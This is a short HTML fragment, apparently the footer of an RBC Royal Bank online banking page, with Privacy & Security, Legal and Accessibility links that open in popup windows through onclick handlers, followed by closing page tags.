		<p><a href="http://www.rbc.com/privacysecurity/ca/index.html" onclick="return popupNewbrowser(this.href)" target="_blank" title="Privacy &amp; Security (opens new window) " class="linkedtextandicon"><span>	     	Privacy &amp; Security	</span></a>|<a href="https://www.rbcroyalbank.com/onlinebanking/legal.html" onclick="return popupHelp(this.href)" target="_blank" title="Legal (opens new window)" class="linkedtextandicon"><span>	   	Legal	</span></a>|    <a href="http://www.rbc.com/accessibility/" onclick="return popupNewbrowser(this.href)" target="_blank" title="Accessibility (opens new window) " class="linkedtextandicon"><span>        	Accessibility        </span></a>
	    	
		</p>
	</div>
</div>        		
		
		
	</div></body></html>